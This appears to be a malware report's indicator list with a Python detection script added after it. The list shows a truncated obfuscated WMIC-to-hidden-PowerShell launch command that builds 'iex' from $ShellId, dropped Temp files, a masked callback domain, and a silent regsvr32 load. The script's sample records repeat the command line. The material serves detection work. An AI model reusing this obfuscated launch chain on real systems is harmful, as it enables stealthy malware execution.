Technical information
- '<SYSTEM32>\wbem\wmic.exe' PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER -nOPRofiLe -win 01 . ( $SHElLiD[1]+$shELLiD[13]+'x')( "\" .( `$eNV:comSPec[4"\" + ([ChAR]44).ToString() + "\"26"\" + ([ChAR]4...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\ose00000
- 'pa###sog.com':443
- DNS ASK pa###sog.com
- '<SYSTEM32>\wbem\wmic.exe' PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER -nOPRofiLe -win 01 . ( $SHElLiD[1]+$shELLiD[13]+'x')( "\" .( `$eNV:comSPec[4"\" + ([ChAR]44).ToString() + "\"26"\" + ([ChAR]4...' (with hidden window)
- '<SYSTEM32>\regsvr32.exe' -s %TEMP%\ose00000.
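The chain above (WMIC `process call create` launching a hidden, profile-less PowerShell that rebuilds the token `iex` from characters of `$ShellId` and `$env:ComSpec`, then regsvr32 silently loading the file dropped in %TEMP%) can be flagged from process-creation telemetry. The Python below is an added example, not code or telemetry from this report: the Sysmon-style records, field names and rule names are this example's own assumptions. It resolves the visible `$SHElLiD[1]+$shELLiD[13]+'x'` trick against the stock value `Microsoft.PowerShell` (index 1 is `i`, index 13 is `e`) and handles only single-index pieces, since the ComSpec index list is truncated in the report.

```python
"""Detection helpers for the WMIC -> PowerShell -> regsvr32 chain listed above.
Added example: not the report's own code or telemetry. Records are constructed
to resemble Sysmon Event ID 1 fields (Image, ParentImage, CommandLine)."""
import re

# Stock values on a default Windows install; the sample's index tricks only
# work because these strings are predictable ("Microsoft.PowerShell"[1] == "i").
DEFAULT_SHELLID = "Microsoft.PowerShell"
DEFAULT_COMSPEC = r"C:\Windows\system32\cmd.exe"

_PIECE = re.compile(
    r"\$(?:env:)?(?P<var>shellid|comspec)\[(?P<idx>\d+)\]|'(?P<lit>[^']*)'",
    re.IGNORECASE,
)

def resolve_index_concat(expr: str) -> str:
    """Evaluate a '+'-joined chain of $ShellId[n], $env:ComSpec[n] and 'literal'
    pieces against the defaults, e.g. "$SHElLiD[1]+$shELLiD[13]+'x'" -> "iex".
    Single-index pieces only (the multi-index ComSpec form is truncated above)."""
    out = []
    for m in _PIECE.finditer(expr):
        if m.group("lit") is not None:
            out.append(m.group("lit"))
        else:
            src = DEFAULT_SHELLID if m.group("var").lower() == "shellid" else DEFAULT_COMSPEC
            out.append(src[int(m.group("idx"))])
    return "".join(out)

def _prefix_re(full: str, min_len: int) -> str:
    """Regex for any prefix of `full` of at least `min_len` chars, longest first;
    powershell.exe accepts unambiguous parameter prefixes (-nop, -noni, -win)."""
    alts = [re.escape(full[:i]) for i in range(len(full), min_len - 1, -1)]
    return "(?:" + "|".join(alts) + ")"

# Applied to a lower-cased, whitespace-collapsed command line.
PS_FLAGS = {
    "exec_bypass":     r"-(?:ep|" + _prefix_re("executionpolicy", 2) + r")\s+bypass\b",
    "hidden_window":   r"-" + _prefix_re("windowstyle", 1) + r"\s+(?:0*1|hidden)\b",  # -win 01 == Hidden
    "no_profile":      r"-" + _prefix_re("noprofile", 3) + r"\b",
    "non_interactive": r"-" + _prefix_re("noninteractive", 4) + r"\b",
    "iex_via_index":   r"\$(?:env:)?(?:shellid|comspec)\[\d+\]",  # runtime-built 'iex'
}

def _norm(cmd: str) -> str:
    return re.sub(r"\s+", " ", cmd).strip().lower()

def _ps_flags(cmd: str) -> list:
    return sorted(name for name, pat in PS_FLAGS.items() if re.search(pat, cmd))

def classify(rec: dict) -> list:
    """Return the rule names hit by one process-creation record."""
    hits = []
    image = rec["image"].lower()
    parent = rec.get("parent_image", "").lower()
    cmd = _norm(rec["command_line"])

    # Rule 1: WMIC as launcher ("process call create", quotes around the
    # verbs tolerated) for a PowerShell command line with the flags above.
    if (image.endswith("\\wmic.exe") and re.search(r"process\W+call\W+create", cmd)
            and "powershell" in cmd):
        flags = _ps_flags(cmd)
        if flags:
            hits.append("wmic_launches_powershell:" + ",".join(flags))

    # Rule 2: the child side. Win32_Process.Create runs inside the WMI provider
    # host, so the spawned PowerShell's parent is WmiPrvSE.exe, not wmic.exe.
    if image.endswith("\\powershell.exe") and parent.endswith("\\wmiprvse.exe"):
        flags = _ps_flags(cmd)
        if flags:
            hits.append("wmiprvse_parent_powershell:" + ",".join(flags))

    # Rule 3: regsvr32 silently (-s or /s) loading a file from a Temp directory
    # that carries no DLL/OCX extension (cf. %TEMP%\ose00000 above).
    if image.endswith("\\regsvr32.exe"):
        m = re.search(r"(?:^|\s)[-/]s\s+\"?([^\"\s]+)", cmd)
        if m:
            target = m.group(1)
            in_temp = "\\temp\\" in target or target.startswith("%temp%")
            no_ext = not re.search(r"\.(?:dll|ocx)$", target)
            if in_temp and no_ext:
                hits.append("regsvr32_silent_temp_payload")
    return hits

# Constructed records (not from the report); the malicious command lines
# mirror the visible part of the ones listed above.
PS_CMD = r"pOWERSHElL -eP BypaSS -NONinTER -nOPRofiLe -win 01 . ( $SHElLiD[1]+$shELLiD[13]+'x')"
SAMPLE_RECORDS = [
    {"image": r"C:\Windows\System32\wbem\wmic.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "wmic.exe PRoCEss 'call' \"CReatE\" \"" + PS_CMD + "\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": PS_CMD},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ose00000"},
    {"image": r"C:\Windows\System32\regsvr32.exe",  # benign: registers a real DLL
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\example.dll"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["image"], "->", classify(rec) or "clean")
```

Rule 2 matters in practice: a parent-child rule written as wmic.exe -> powershell.exe will never fire for this chain, because Win32_Process.Create makes WmiPrvSE.exe the parent of the spawned process. The benign fourth record shows that the regsvr32 rule keys on the Temp location and missing extension, not on `-s` alone.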